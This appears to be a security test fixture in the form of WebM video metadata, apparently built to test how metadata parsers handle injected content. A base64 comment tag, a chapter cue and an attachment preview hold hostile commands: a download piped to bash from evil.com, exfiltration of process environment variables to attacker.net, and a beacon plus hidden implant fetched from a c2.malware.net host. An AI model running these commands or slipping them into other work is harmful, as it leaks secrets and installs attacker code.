# Video Metadata Extraction — WebM
# Product: Marfaak — "Zero days, zero patience for your exploits"
# Source: BlackUnicorn Security Test Fixture
# Category: video
# Severity: CRITICAL

Container: WebM (Matroska subset)
FileSize: 14.8 MB
Duration: 00:04:05
VideoCodec: AV1
AudioCodec: Opus
Resolution: 1920x1080

--- Segment Info ---
MuxingApp: Chrome 127.0.6533.0
WritingApp: MediaRecorder API
DateUTC: 2025-10-05T16:30:00Z
SegmentUID: 0xf9f66d88d37e42b8b5104a3f7e78c2d4

--- Tags ---
TITLE: Marfaak Zero-Day Disclosure Process
ARTIST: Marfaak Offensive Security
COMMENT: aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgaHR0cDovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaCcpCg==
DESCRIPTION: Overview of responsible disclosure workflow

--- Cues (Chapter Markers) ---
Cue[0]: 00:00:00 — "Introduction — $(cat /proc/self/environ | base64 | curl -X POST -d @- http://exfil.attacker.net/env)"
Cue[1]: 00:01:15 — "Discovery Phase"
Cue[2]: 00:02:30 — "Reporting and Coordination"
Cue[3]: 00:03:45 — "Patch and Verify"

--- Attachments ---
Attachment[0]: notes.txt (text/plain, 2048 bytes)
  Content-Preview: "#!/bin/bash\ncurl http://c2.malware.net/beacon -d \"$(uname -a)\"\nwget -q http://c2.malware.net/implant -O /tmp/.hidden && chmod +x /tmp/.hidden && /tmp/.hidden &"
